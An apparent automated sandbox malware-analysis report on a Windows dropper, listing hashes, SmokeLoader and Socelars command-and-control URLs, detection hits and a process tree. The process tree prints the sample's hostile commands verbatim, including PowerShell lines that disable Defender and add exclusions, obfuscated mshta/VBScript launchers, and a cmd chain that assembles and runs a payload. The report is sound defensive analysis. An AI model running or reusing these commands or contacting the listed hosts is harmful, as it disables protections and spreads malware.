Analysis
-
max time kernel
11s -
max time network
152s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
26/12/2021, 18:41
Static task
static1
Behavioral task
behavioral1
Sample
2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
Resource
win7-en-20211208
General
-
Target
2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
-
Size
4.4MB
-
MD5
244f3fcae34a514dd3e78f3d4d72f92a
-
SHA1
5ac41859cefd7ad0536b36c7e82f33e702514fe2
-
SHA256
2992c4b00c678a438b0b935e09e0fd341a44c46fe0dd2f18621570f55133e4df
-
SHA512
245ab74d77796452086c2874af05c7c1d51e7c552c47a655388575cb4add160b743082c4db84f35f2755b2caa78b9b4af2577f1785a4919308fefea20acdc53f
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2692 2452 rundll32.exe 69 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x0006000000013929-149.dat family_socelars behavioral1/files/0x0006000000013929-185.dat family_socelars -
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
resource yara_rule behavioral1/files/0x00060000000132fe-69.dat aspack_v212_v242 behavioral1/files/0x00060000000132cc-71.dat aspack_v212_v242 behavioral1/files/0x00060000000132cc-72.dat aspack_v212_v242 behavioral1/files/0x00060000000132fe-70.dat aspack_v212_v242 behavioral1/files/0x0006000000013306-75.dat aspack_v212_v242 behavioral1/files/0x0006000000013306-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 324 setup_installer.exe 1484 setup_install.exe 1140 Sun07689b7dd63a1a2e.exe 828 Sun07426f49ca3.exe 920 Sun0792bfe25c4e6f.exe 1892 Sun07853f394a6f2.exe 1224 Sun07fbac34efb13666.exe 1256 Sun0705fdd6f3fa.exe 1504 Sun074dcdeb3534e450.exe 1792 Sun079abff5ef.exe 2004 Sun074812abe11c68090.exe 776 Sun07b9107c074617.exe 1996 Sun076d6b9f10493573.exe 1708 Sun074812abe11c68090.tmp 440 Sun074812abe11c68090.exe -
Loads dropped DLL 49 IoCs
pid Process 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 324 setup_installer.exe 324 setup_installer.exe 324 setup_installer.exe 324 setup_installer.exe 324 setup_installer.exe 324 setup_installer.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1012 cmd.exe 1700 cmd.exe 1952 cmd.exe 1488 cmd.exe 920 Sun0792bfe25c4e6f.exe 920 Sun0792bfe25c4e6f.exe 1892 Sun07853f394a6f2.exe 1892 Sun07853f394a6f2.exe 1508 cmd.exe 1508 cmd.exe 1224 Sun07fbac34efb13666.exe 1224 Sun07fbac34efb13666.exe 1728 cmd.exe 1728 cmd.exe 2000 cmd.exe 1256 Sun0705fdd6f3fa.exe 1256 Sun0705fdd6f3fa.exe 1744 cmd.exe 576 cmd.exe 1504 Sun074dcdeb3534e450.exe 1504 Sun074dcdeb3534e450.exe 1616 cmd.exe 2004 Sun074812abe11c68090.exe 2004 Sun074812abe11c68090.exe 1056 cmd.exe 776 Sun07b9107c074617.exe 776 Sun07b9107c074617.exe 1792 Sun079abff5ef.exe 1792 Sun079abff5ef.exe 2004 Sun074812abe11c68090.exe 1708 Sun074812abe11c68090.tmp 1708 Sun074812abe11c68090.tmp 1708 Sun074812abe11c68090.tmp 1708 Sun074812abe11c68090.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ip-api.com 73 ipinfo.io 74 ipinfo.io 75 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 1252 1484 WerFault.exe 28 2936 1792 WerFault.exe 53 800 1892 WerFault.exe 43 2864 920 WerFault.exe 46 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun07fbac34efb13666.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun07fbac34efb13666.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun07fbac34efb13666.exe -
Kills process with taskkill 2 IoCs
pid Process 2564 taskkill.exe 2296 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1224 Sun07fbac34efb13666.exe 1224 Sun07fbac34efb13666.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1792 Sun079abff5ef.exe Token: SeAssignPrimaryTokenPrivilege 1792 Sun079abff5ef.exe Token: SeLockMemoryPrivilege 1792 Sun079abff5ef.exe Token: SeIncreaseQuotaPrivilege 1792 Sun079abff5ef.exe Token: SeMachineAccountPrivilege 1792 Sun079abff5ef.exe Token: SeTcbPrivilege 1792 Sun079abff5ef.exe Token: SeSecurityPrivilege 1792 Sun079abff5ef.exe Token: SeTakeOwnershipPrivilege 1792 Sun079abff5ef.exe Token: SeLoadDriverPrivilege 1792 Sun079abff5ef.exe Token: SeSystemProfilePrivilege 1792 Sun079abff5ef.exe Token: SeSystemtimePrivilege 1792 Sun079abff5ef.exe Token: SeProfSingleProcessPrivilege 1792 Sun079abff5ef.exe Token: SeIncBasePriorityPrivilege 1792 Sun079abff5ef.exe Token: SeCreatePagefilePrivilege 1792 Sun079abff5ef.exe Token: SeCreatePermanentPrivilege 1792 Sun079abff5ef.exe Token: SeBackupPrivilege 1792 Sun079abff5ef.exe Token: SeRestorePrivilege 1792 Sun079abff5ef.exe Token: SeShutdownPrivilege 1792 Sun079abff5ef.exe Token: SeDebugPrivilege 1792 Sun079abff5ef.exe Token: SeAuditPrivilege 1792 Sun079abff5ef.exe Token: SeSystemEnvironmentPrivilege 1792 Sun079abff5ef.exe Token: SeChangeNotifyPrivilege 1792 Sun079abff5ef.exe Token: SeRemoteShutdownPrivilege 1792 Sun079abff5ef.exe Token: SeUndockPrivilege 1792 Sun079abff5ef.exe Token: SeSyncAgentPrivilege 1792 Sun079abff5ef.exe Token: SeEnableDelegationPrivilege 1792 Sun079abff5ef.exe Token: SeManageVolumePrivilege 1792 Sun079abff5ef.exe Token: SeImpersonatePrivilege 1792 Sun079abff5ef.exe Token: SeCreateGlobalPrivilege 1792 Sun079abff5ef.exe Token: 31 1792 Sun079abff5ef.exe Token: 32 1792 Sun079abff5ef.exe Token: 33 1792 Sun079abff5ef.exe Token: 34 1792 Sun079abff5ef.exe Token: 35 1792 Sun079abff5ef.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 1656 wrote to memory of 324 1656 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 27 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 324 wrote to memory of 1484 324 setup_installer.exe 28 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1432 1484 setup_install.exe 30 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1536 1484 setup_install.exe 31 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1484 wrote to memory of 1952 1484 setup_install.exe 32 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1536 wrote to memory of 1768 1536 cmd.exe 33 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1432 wrote to memory of 1500 1432 cmd.exe 34 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1012 1484 setup_install.exe 36 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1488 1484 setup_install.exe 35 PID 1484 wrote to memory of 1700 1484 setup_install.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0792bfe25c4e6f.exe4⤵
- Loads dropped DLL
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun0792bfe25c4e6f.exeSun0792bfe25c4e6f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:920 -
C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe"C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe"6⤵PID:2648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 15366⤵
- Program crash
PID:2864
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07853f394a6f2.exe4⤵
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07853f394a6f2.exeSun07853f394a6f2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1892 -
C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe"C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe"6⤵PID:1736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 15086⤵
- Program crash
PID:800
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07426f49ca3.exe4⤵
- Loads dropped DLL
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07426f49ca3.exeSun07426f49ca3.exe5⤵
- Executes dropped EXE
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07689b7dd63a1a2e.exe4⤵
- Loads dropped DLL
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07689b7dd63a1a2e.exeSun07689b7dd63a1a2e.exe5⤵
- Executes dropped EXE
PID:1140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07aef696b81cc09ee.exe4⤵PID:588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07fbac34efb13666.exe4⤵
- Loads dropped DLL
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07fbac34efb13666.exeSun07fbac34efb13666.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun074812abe11c68090.exe4⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exeSun074812abe11c68090.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\is-4KD7A.tmp\Sun074812abe11c68090.tmp"C:\Users\Admin\AppData\Local\Temp\is-4KD7A.tmp\Sun074812abe11c68090.tmp" /SL5="$1016E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe"C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe" /SILENT7⤵
- Executes dropped EXE
PID:440 -
C:\Users\Admin\AppData\Local\Temp\is-U0VM0.tmp\Sun074812abe11c68090.tmp"C:\Users\Admin\AppData\Local\Temp\is-U0VM0.tmp\Sun074812abe11c68090.tmp" /SL5="$2016E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe" /SILENT8⤵PID:1920
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0705fdd6f3fa.exe /mixone4⤵
- Loads dropped DLL
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun0705fdd6f3fa.exeSun0705fdd6f3fa.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07b9107c074617.exe4⤵
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exeSun07b9107c074617.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:776 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF """" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )6⤵PID:1352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "" =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe" ) do taskkill /f -im "%~nxe"7⤵PID:2220
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "Sun07b9107c074617.exe"8⤵
- Kills process with taskkill
PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\nU82.eXE..\NU82.ExE -pfpj1T6lr~GKuX8⤵PID:2284
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF ""-pfpj1T6lr~GKuX "" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )9⤵PID:2324
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "-pfpj1T6lr~GKuX " =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ) do taskkill /f -im "%~nxe"10⤵PID:2508
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLOSE(cREATeOBJecT ( "wSCRIpT.ShELl" ). run ("cmd /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = ""MZ"" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz + NXKZ.hO + UX2~UVNN.vM2 ..\vFeGMw.qLW & DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW " , 0 ,trUE) )9⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 &eChO | sET /p = "MZ" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S+2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz +NXKZ.hO +UX2~UVNN.vM2 ..\vFeGMw.qLW &DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW10⤵PID:2952
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eChO "11⤵PID:3012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>4LNjycCw.Z2"11⤵PID:3024
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y ..\vFEGMW.QlW11⤵PID:3060
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun079abff5ef.exe4⤵
- Loads dropped DLL
PID:576 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun079abff5ef.exeSun079abff5ef.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2480
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 14406⤵
- Program crash
PID:2936
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun076d6b9f10493573.exe4⤵
- Loads dropped DLL
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun076d6b9f10493573.exeSun076d6b9f10493573.exe5⤵
- Executes dropped EXE
PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun074dcdeb3534e450.exe4⤵
- Loads dropped DLL
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074dcdeb3534e450.exeSun074dcdeb3534e450.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1504
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 4684⤵
- Program crash
PID:1252
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2692 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2700
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2852